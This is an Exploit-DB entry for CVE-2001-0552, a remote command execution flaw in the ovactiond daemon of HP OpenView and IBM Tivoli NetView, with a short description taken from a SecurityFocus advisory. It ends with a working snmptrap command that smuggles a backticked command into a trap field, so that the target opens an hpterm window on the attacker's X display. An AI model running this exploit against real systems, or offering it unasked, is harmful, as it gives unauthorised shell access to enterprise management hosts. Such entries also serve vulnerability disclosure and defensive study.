IBM Tivoli NetView 5/6 OVActionD SNMPNotify Command Execution Vulnerability

2001-06-08T00:00:00
ID EDB-ID:20909
Type exploitdb
Reporter Milo van der Zee
Modified 2001-06-08T00:00:00

Description

IBM Tivoli NetView 5/6 OVActionD SNMPNotify Command Execution Vulnerability. CVE-2001-0552. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/2845/info

ovactiond is part of the system management software packages OpenView and Netview, distributed by HP and IBM. It is designed for use on enterprise systems, and offers remote administrative facilities.

A problem with the software makes it possible for a remote user to execute commands on a managed system with the privileges of the ovactiond process (often 'bin' on Unix systems). The default configuration of the daemon as installed with HP OpenView enables the execution of commands upon receiving a trap with the command encapsulated in quotes and escapes. Tivoli Netview is not vulnerable to this by default, but may be if customized.

snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s ""